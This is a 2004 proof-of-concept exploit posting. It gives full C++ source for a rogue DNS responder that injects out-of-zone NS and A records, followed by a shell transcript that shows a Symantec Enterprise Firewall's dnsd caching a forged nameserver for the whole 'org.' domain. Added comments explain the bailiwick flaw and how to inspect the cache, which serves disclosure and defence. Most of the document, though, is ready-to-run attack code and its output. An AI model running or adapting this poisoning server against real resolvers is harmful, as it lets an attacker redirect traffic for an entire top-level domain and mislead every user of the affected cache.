PoC poisoning cache attack SEF 8 and later
来源:www.datafull.com 作者:fryxar 发布时间:2004-06-28  

PoC poisoning cache attack SEF 8 and later


#########################################################
# Begin poc.cpp
#########################################################

// PoC poisoning cache attack SEF 8 and later (by fryxar)
// Requires poslib 1.0.4 library
// Compile: g++ `poslib-config --libs --cflags --server` poc.cpp -o poc

#define POS_DEFAULTLOG
#define POS_DEFAULTLOG_STDERR
#define POS_DEFAULTLOG_SYSLOG

// Server include file
#include <poslib/server/server.h>

// For signal handling
#include <stdlib.h>
#include <signal.h>

// Domain name this server answers for. Set once in main() from argv[1] and
// compared against the name of every incoming question in my_handle_query().
char *dyndomain;

// Forward declaration: main() installs this function as the poslib
// handle_query callback before its definition appears further down.
DnsMessage *my_handle_query(pending_query *query);

/**
 * Signal handler registered by main() for SIGINT and SIGTERM.
 *
 * Only raises the poslib quit flag; the server itself is shut down outside
 * this handler.
 *
 * @param sig  Signal number delivered by the OS (not inspected).
 */
void cleanup(int sig) {
    (void)sig;  /* the same action is taken for every signal routed here */
    pos_setquitflag();
}

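/**
 * Entry point of the proof-of-concept DNS responder.
 *
 * Takes exactly one argument, the domain name the responder answers for,
 * stores it in the global `dyndomain`, creates one UDP server socket on the
 * "any" address, installs my_handle_query() as the query callback and runs
 * the poslib server loop.
 *
 * Review fixes relative to the published listing:
 *  - the log message string literal was split across two lines by mail
 *    wrapping, which is not valid C++; it is rejoined here;
 *  - PException is caught by reference rather than by value, which avoids
 *    copying the exception object.
 *
 * @return 0 once posserver_run() has returned, 1 on a usage error or when a
 *         PException is caught.
 */
int main(int argc, char **argv) {
    _addr a;

    try {
        /* exactly one argument is expected: the domain name to answer for */
        if (argc != 2) {
            printf("Usage: %s [domainname]\n", argv[0]);
            return 1;
        }
        dyndomain = argv[1];
        /* "any" is handed to poslib as the address text.
         * NOTE(review): presumably this means every local interface on the
         * library's default DNS port - confirm against poslib before running
         * this anywhere but an isolated test network. */
        txt_to_addr(&a, "any");

        poslib_config_init();

        /* bring up posadis: a single UDP server socket, no TCP listener */
        servers.push_front(ServerSocket(ss_udp, udpcreateserver(&a)));

        /* use the posadis logging system */
        pos_log(context_none, log_info,
                "Proof of concept DNS server starting up...");

        /* SIGINT and SIGTERM both go to cleanup(), which sets the quit flag */
        signal(SIGINT, cleanup);
        signal(SIGTERM, cleanup);

        /* every incoming query is handed to my_handle_query() */
        handle_query = my_handle_query;

        /* run the server loop */
        posserver_run();
    } catch (PException &p) {
        printf("Fatal exception: %s\n", p.message);
        return 1;
    }

    return 0;
}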

/* the entry function which will handle all queries */
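/**
 * Query callback: builds the reply for every DNS query the server receives.
 *
 * - A query with no question section gets RCODE_QUERYERR.
 * - An A query for `dyndomain` gets an answer record for `dyndomain`, plus
 *   an authority-section NS record for "org" and an additional-section A
 *   record for "fakedns.com".
 * - Any other query gets RCODE_SRVFAIL.
 *
 * Why this matters to a defender: the authority and additional records name
 * "org" and "fakedns.com", neither of which lies inside the zone the queried
 * name belongs to. A caching resolver should drop such out-of-zone
 * (out-of-bailiwick) records. The transcript that follows this listing
 * shows the tested dnsd storing the NS record under "org." instead.
 *
 * Review fix relative to the published listing: the trailing comment on the
 * first rr_fromstring() line was split by mail wrapping, leaving the bare
 * text `Anything...` as a statement; the comment is rejoined here.
 *
 * @param query  Pending query as handed over by poslib; only
 *               query->message is read.
 * @return Newly allocated DnsMessage.
 *         NOTE(review): presumably poslib takes ownership and frees it -
 *         confirm.
 */
DnsMessage *my_handle_query(pending_query *query) {
    DnsMessage *a = new DnsMessage();
    DnsQuestion q;
    DnsRR rr;

    /* mirror the ID and RD flag of the query; recursion is never offered */
    a->ID = query->message->ID;
    a->RD = query->message->RD;
    a->RA = false;

    if (query->message->questions.begin() ==
        query->message->questions.end()) {
        /* query did not contain a question.
         * NOTE(review): QR is only set further down, so this error reply is
         * returned without it - confirm what DnsMessage defaults QR to. */
        a->RCODE = RCODE_QUERYERR;
        return a;
    }
    /* only the first question is looked at and echoed back */
    q = *query->message->questions.begin();
    a->questions.push_back(q);
    a->QR = true;

    pos_log(context_server, log_info, "Query: [%s,%s]", q.QNAME.tocstr(),
            str_qtype(q.QTYPE).c_str());

    if (q.QTYPE == DNS_TYPE_A && q.QNAME == dyndomain) {
        /* answer section: A record for the name that was actually asked */
        rr = DnsRR(dyndomain, DNS_TYPE_A, CLASS_IN, 3600);
        string data = rr_fromstring(DNS_TYPE_A, "200.200.200.200"); // Anything...
        rr.RDLENGTH = data.size();
        rr.RDATA = (char *)memdup(data.c_str(), data.size());
        a->answers.push_back(rr);

        /* authority section: NS record for "org", a zone this server is not
         * authoritative for; a resolver that enforces bailiwick rules
         * discards it */
        rr = DnsRR("org", DNS_TYPE_NS, CLASS_IN, 3600);
        data = rr_fromstring(DNS_TYPE_NS, "fakedns.com");
        rr.RDLENGTH = data.size();
        rr.RDATA = (char *)memdup(data.c_str(), data.size());
        a->authority.push_back(rr);

        /* additional section: address record for the name used in the NS
         * record above, also outside the queried zone */
        rr = DnsRR("fakedns.com", DNS_TYPE_A, CLASS_IN, 3600);
        data = rr_fromstring(DNS_TYPE_A, "200.200.200.201"); // Anything...
        rr.RDLENGTH = data.size();
        rr.RDATA = (char *)memdup(data.c_str(), data.size());
        a->additional.push_back(rr);
    } else {
        /* we don't want this */
        a->RCODE = RCODE_SRVFAIL;
    }
    return a;
}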
#########################################################
# End poc.cpp
#########################################################


fryxar.afraid.org # ./poc fryxar.afraid.org

and now, in your SEF Firewall:

firewall # kill `ps -ef | awk '/[d]nsd/ { print $2 }'` # Cleaning the
cache

firewall # nslookup afraid.org 127.0.0.1 # Caching org. NS
Server: localhost
Address: 127.0.0.1

Non-authoritative answer:
Name: afraid.org
Addresses: 69.42.89.56, 69.42.89.53, 69.42.89.55, 69.42.89.54

firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump

firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached
"org." NS
org.
172775 NS TLD2.ULTRADNS.NET.
172775 NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.

firewall # nslookup fryxar.afraid.org 127.0.0.1 # Domain owned by my
poisoned DNS
Server: localhost
Address: 127.0.0.1

Non-authoritative answer:
Name: fryxar.afraid.org
Address: 200.200.200.200

firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump

firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached
"org." NS
org.
3567 NS fakedns.com. <- Ooohh!
3567 NS TLD2.ULTRADNS.NET.
3567 NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.

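SEF now treats the fakedns.com server as an authoritative nameserver for
the "org." domain. It learned this from the fryxar.afraid.org DNS server,
which is authoritative only for the fryxar.afraid.org domain. In other
words, dnsd cached an authority-section record for a zone the answering
server has no authority over, where a resolver should discard such
out-of-zone records. The cache dump shown above (kill -USR1, then reading
/usr/adm/sg/dnsd.dat) is the way to check whether the cached NS set of a
top-level domain contains an entry that does not belong there.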
--
fryxar <fryxar@datafull.com>




 